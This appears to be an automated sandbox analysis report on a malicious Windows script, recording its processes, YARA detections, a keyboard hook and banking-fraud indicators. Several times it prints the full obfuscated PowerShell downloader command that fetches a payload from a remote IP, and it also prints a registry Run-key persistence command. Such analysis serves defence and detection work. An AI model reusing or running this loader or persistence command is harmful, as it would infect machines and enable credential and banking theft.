              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5B4AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

              E-Banking Fraud

              Source: Yara match File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              System Summary

              Source: amsi32_1492.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5596
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5596
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3489B1A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3489BF52
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348964FB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34895CD8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34893BFB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046BF250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046BFB20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046BEF08
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04909350
              Source: rOferta_SKGNMECLemnedefinitionen353523577.wsf Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: amsi32_1492.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winWSF@17/9@2/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Sneglefart.Glo
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoco44qv.bpu.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6256
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1492
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
